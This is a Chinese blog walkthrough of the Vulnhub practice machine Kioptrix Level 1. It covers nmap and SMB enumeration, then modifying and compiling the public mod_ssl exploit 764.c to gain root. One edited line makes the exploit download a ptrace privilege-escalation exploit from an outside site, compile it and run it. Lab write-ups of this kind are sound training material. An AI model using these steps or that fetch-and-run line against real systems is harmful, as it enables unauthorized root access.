kioptrix-level-1

最新推荐文章于 2024-01-24 09:21:42 发布
最新推荐文章于 2024-01-24 09:21:42 发布
阅读量1w 收藏 6
点赞数 4
分类专栏: Vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43693132/article/details/112342951
版权

kioptrix-level-1

项目地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22
提示:靶机网络连接方式使用NAT模式。

文章目录

一、信息收集

1. 使用fping工具查找靶机IP:

命令如下:

kali@kali:~/Desktop$ fping -asg 172.20.10.0/24

备注:得到靶机地址为:172.20.10.14
172.20.10.1
172.20.10.13
172.20.10.14

2. 使用nmap对目标主机端口进行枚举:

命令如下:

kali@kali:~/Desktop$ sudo nmap -nvv -sC -sV -sS -Pn 172.20.10.14

Nmap 7.80 scan initiated Fri Jul 10 13:14:12 2020 as: nmap -nvv -sC -sVS -Pn -oN /home/kali/Desktop/dkscan.txt 172.20.10.14
Nmap scan report for 172.20.10.14
Host is up, received arp-response (0.00062s latency).
Scanned at 2020-07-10 13:14:12 EDT for 127s
Not shown: 994 closed ports
Reason: 994 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 35 109482092953601530927446985143812377560925655194254170270380314520841776849335628258408994190413716152105684423280369467219093526740118507720167655934779634416983599247086840099503203800281526143567271862466057363705861760702664279290804439502645034586412570490614431533437479630834594344497670338190191879537
| 1024 8f:8e:5b:81:ed:21🆎c1:80:e1:57:a3:3c:85:c4:71 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAKtycvxuV/e7s2cN74HyTZXHXiBrwyiZe/PKT/inuT5NDSQTPsGiyJZU4gefPAsYKSw5wLe28TDlZWHAdXpNdwyn4QrFQBjwFR+8WbFiAZBoWlSfQPR2RQW8i32Y2P2V79p4mu742HtWBz0hTjkd9qL5j8KCUPDfY9hzDuViWy7PAAAAFQCY9bvq+5rs1OpY5/DGsGx0k6CqGwAAAIBVpBtIHbhvoQdN0WPe8d6OzTTFvdNRa8pWKzV1Hpw+e3qsC4LYHAy1NoeaqK8uJP9203MEkxrd2OoBJKn/8EXlKAco7vC1dr/QWae+NEkI1a38x0Ml545vHAGFaVUWkffHekjhR476Uq4N4qeLfFp5B+v+9flLxYVYsY/ymJKpNgAAAIEApyjrqjgX0AE4fSBFntGFWM3j5M3lc5jw/0qufXlHJu8sZG0FRf9wTI6HlJHHsIKHA7FZ33vGLq3TRmvZucJZ0l55fV2ASS9uvQRE+c8P6w72YCzgJN7v4hYXxnY4RiWvINjW/F6ApQEUJc742i6Fn54FEYAIy5goatGFMwpVq3Q=
| 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvv8UUWsrO7+VCG/rTWY72jElft4WXfXGWybh141E8XnWxMCu+R1qdocxhh+4Clz8wO9beuZzG1rjlAD+XHiR3j2P+sw6UODeyBkuP24a+7V8P5nu9ksKD1fA83RyelgSgRJNQgPfFU3gngNno1yN6ossqkcMQTI1CY5nF6iYePs=
|sshv1: Server supports SSHv1
80/tcp open http syn-ack ttl 64 Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
| Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https syn-ack ttl 64 Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
| Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|ssl-date: 2020-07-10T17:17:09+00:00; +1m50s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status syn-ack ttl 64 1 (RPC #100024)
MAC Address: 00:0C:29:3D:9B:28 (VMware)

Host script results:
|clock-skew: 1m49s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)
| Names:
| KIOPTRIX<00> Flags:
| KIOPTRIX<03> Flags:
| KIOPTRIX<20> Flags:
| \x01\x02__MSBROWSE_\x02<01> Flags:
| MYGROUP<00> Flags:
| MYGROUP<1d> Flags:
| MYGROUP<1e> Flags:
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher…
| Check 1 (port 41034/tcp): CLEAN (Couldn’t connect)
| Check 2 (port 28047/tcp): CLEAN (Couldn’t connect)
| Check 3 (port 63186/udp): CLEAN (Failed to receive data)
| Check 4 (port 34753/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn’t establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/…/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
#Nmap done at Fri Jul 10 13:16:19 2020 – 1 IP address (1 host up) scanned in 126.81 seconds

二、信息利用

1. 访问80端口和443端口,并查看源码信息:

使用80端口访问到web页面,查看源码没发现啥有用的信息!
如下图所示:
在这里插入图片描述

换https协议后,查看源码同样也没发现啥有用的信息!
如下图所示:
在这里插入图片描述

2. 使用gobuster对web页面进行枚举:

命令如下:

kali@kali:~/Desktop$ gobuster dir -w /home/kali/Desktop/zd/dir.txt -u http://172.20.10.14 -x php,asp,zip

在这里插入图片描述

发现存在一个test.php文件,通过web访问后没啥有用信息
在这里插入图片描述

3. 查看139端口:

使用smaclient工具进行smb服务枚举时,发现匿名登陆成功
在这里插入图片描述

使用匿名登陆查询里面文件信息时,提示拒绝访问
命令如下:

kali@kali:~/Desktop$ smbclient "\\\\172.20.10.14\\IPC$"

在这里插入图片描述

4.根据nmap枚举后得到的mod_ssl服务版本信息查找可用poc:

命令如下:

kali@kali:~/Desktop$ searchsploit mod_ssl

发现mod_ssl版本小于2.8.7都存在可利用漏洞
在这里插入图片描述
定位该文件的存放路径,并将其拷贝至桌面
命令如下:

kali@kali:~/Desktop$ locate 764.c
kali@kali:~/Desktop$ cp /usr/share/exploitdb/exploits/unix/remote/764.c /home/kali/Desktop

在这里插入图片描述
对该文件进行更改
命令如下:

kali@kali:~/Desktop$ vi /home/Desktop/764.c

操作步骤:
(1)在25、26行中加入头文件<openssl/rc4.h>和<openssl/md5.h>
(2)第666行url修改为http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
(3)第964行,修改为const unsigned char * p, end;*
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
文件更改完后进行编译
注意:不安装libssl1.0-dev,无法进行编译
命令如下:

kali@kali:~/Desktop$ sudo apt-get install libssl1.0-dev
kali@kali:~/Desktop$ gcc 764.c -o 567 -lcrypto

在这里插入图片描述
在这里插入图片描述

三. 系统提权:

执行编译好的文件后,成功获得root权限
命令如下:

kali@kali:~/Desktop$ ./567 0x6b 172.20.10.14
whoami

在这里插入图片描述

总结:

(1)使用nmap对端口进行枚举,发现服务器开放了111端口,22端口,139端口,80端口,1024端口以及443端口。
(2)443端口使用的mod_ssl服务版本为2.8.4,该服务版本小于2.8.7都存在可利用漏洞。
(3)编译时需要更改默认文件以及安装libssl1.0-dev。
(4)执行编译后的文件成功获取root权限。

cxyzupup
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
4438无线网络组网代码解析
热门推荐
宁静以致墨的专栏
06-11 30万+
device_bind_process是怎么实现绑定的? enum {     NOSTATE,     UBIND,              //等待接收 握手一次1     WAIT_FOR_TOUCH,     //     WAIT_FOR_CONFIRM,   //点击按键后 回复一次2     BIND_SUCCESS,       //等待接收 握手3次 }; 此
kioptrix_level_1 新手入门级通关攻略
qq_58683895的博客
09-16 673
适用于零基础新人的通关攻略,其中包含涉及到知识点
【Oscp备考-Kioptrix 1】
weixin_44126257的博客
09-13 1622
Oscp备考
【Vulnhub通关】KioptrixLevel 1 (#1)
icewolf00的博客
01-24 1214
注意:本文转载自本人稀土掘金博客。
Linux网络适配器不见了,linux – lspci未显示HyperV网络适配器
weixin_35173650的博客
05-06 4697
我目前正在尝试在HyperV上设置一个debian虚拟机(最终目标是在azure中运行这台机器,它使用了引擎盖下的HyperV虚拟化),但我无法启动网络.该机器最初是在VirtualBox中创建的,并作为VHD映像导出,然后在hyperV Server中重新导入.已删除任何VirtualBox guest虚拟机添加项,并已安装hyperV linux集成工具.服务器配置为为主机的其中一个网络适配器...
elasticsearch-rest-high-level-client-6.8.3-API文档-中英对照版.zip
07-13
赠送jar包:elasticsearch-rest-high-level-client-6.8.3.jar; 赠送原API文档:elasticsearch-rest-high-level-client-6.8.3-javadoc.jar; 赠送源代码:elasticsearch-rest-high-level-client-6.8.3-sources.jar;...
vuInhub靶场实战系列-Kioptrix Level #1
最新发布
06-08
vuInhub靶场实战系列-Kioptrix Level #1
elasticsearch-rest-high-level-client-6.8.3-API文档-中文版.zip
07-13
赠送jar包:elasticsearch-rest-high-level-client-6.8.3.jar; 赠送原API文档:elasticsearch-rest-high-level-client-6.8.3-javadoc.jar; 赠送源代码:elasticsearch-rest-high-level-client-6.8.3-sources.jar;...
vulnhub靶场 Kioptrix-level-1
qq_69775412的博客
10-08 574
简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
渗透日记————Kioptrix Level 1
m0_73700261的博客
04-09 413
扫描端口发现有以下端口开放其中比较重要的有三个端口开放80 22 和139端口。接着使用msf查看版本漏洞接着搜索看看有没有对应的漏洞。sumba端口是Linux系统上的一个免费软件。接着设置攻击靶机ip和对应的payload。cd进入根目录ls一下发现可以成功命令执行。发现靶机ip为:10.102.8.194。是用来为局域网内为不同计算机提供共享服务。发现该sambe服务器为2.2.1a。那么第一步先扫描发现靶机的地址。139端口是一个sumba端口。接着继续搜索历史漏洞。
vulnhub Kioptrix: Level 1 (#1)
箭雨镜屋
11-16 1569
本文使用的方法是利用apache mod_ssl 2.8.4的Remote Buffer Overflow漏洞(CVE-2002-0082)getshell并拿到root权限
Kioptrix Level 1(#1)
MD@@nr丫卡uer
12-08 476
Kioptrix Level 1(#1) 目标:Kioptrix Level 1(VMware) 攻击机:kali(192.168.43.80) 网关:192.168.43.255 #1查看Kioptrix在内网的ip地址 nmap 192.168.43.0/24 -n -sP -sn -n 不做DNS解析 -sP ping扫描 -sn 不做端口扫描 得到ip192.168.43.36 #2查看端口开放情况(nmap) nmap 192.168.43.36 -O -sS -sV -O
KIOPTRIX: LEVEL 1 (#1)
logan_logan的博客
12-19 509
KIOPTRIX: LEVEL 1 (#1) 1.浏览器输入地址打开,是一个Test page网页,接下来开始进行信息收集; 2.信息收集 2.1 使用namp工具对端口进行扫描 发现apache的版本较老,同时开了samba服务,接下来考虑对这两个信息进行更深入的验证。 2.2 使用gobuster枚举目录 对扫描的目录进行验证之后发现没有多少有用信息; 3.漏洞探测 3.1 apache漏洞探测 在kali里面搜索漏洞,接下来开始进行尝试 3.2 samba漏洞探测 使用msf探测到samba版
VulnHub Kioptrix Level 1进行渗透测试的总结与过程
Ba1_Ma0的博客
03-01 1620
Kioptrix_Level_1 主机发现 用netdiscover工具进行内网主机发现。 Netdiscover简介:专用的二层发现工具。拥有主动和被动发现两种方式。 我使用以下命令: netdiscover -i eth0 命令解释 -i:网卡,选择你监控的网卡。比如eth0。 如图: 工具执行后内容: ip192.168.1.104与ip192.168.1.103都是我的主机,只有ip192.168.1.102是未知的主机,所以目标主机ip为192.168.1.102。 内网发现也能用nm
KIOPTRIX: LEVEL 1-VulnHub靶机学习第二篇
qq_27466929的博客
08-23 529
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1
Nginx 网站使用 acme配置 https证书访问步骤
hmx224_2014的专栏
09-03 6万+
https://blog.ekanshu.com.cn 使用 acme配置 https访问 错误信息 由于之前配置过,从新使用名称更新配置文件的时候发现报错,信息如下做个记录,我们不深究先从新生成证书 acme.sh --renew -d blog.ekanshu.com.cn [Tue Sep 1 17:15:35 CST 2020] Renew: 'blog.ekanshu.com.cn' [Tue Sep 1 17:15:36 CST 2020] Single domain='blog.ek
AS学习网址大全
WZ_Yong的专栏
03-29 1万+
都是我在学习过程中精心收集的,大部分为国内网站,绝对是您学习AS最好的去处。本贴于2010年3月22日再次更新,并新加了很多好的网站。1.同时将网址全都贴出来,方便不想下载的朋友使用。2.附件里倒出的bookmarks方便大家直接倒进浏览器。中文博客   Horidream’s Blog http://www.horidream.com/blog   7Yues Weblog  http://w
:default-expand-level
06-05
好的,关于v-org-tree的`:default-expand-level`属性,它可以指定默认展开的层级数。具体来说,该属性的值为一个数字,表示默认展开的层级数,比如设置为2,就表示默认展开到第2层级。 以下是一个示例代码: ``` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值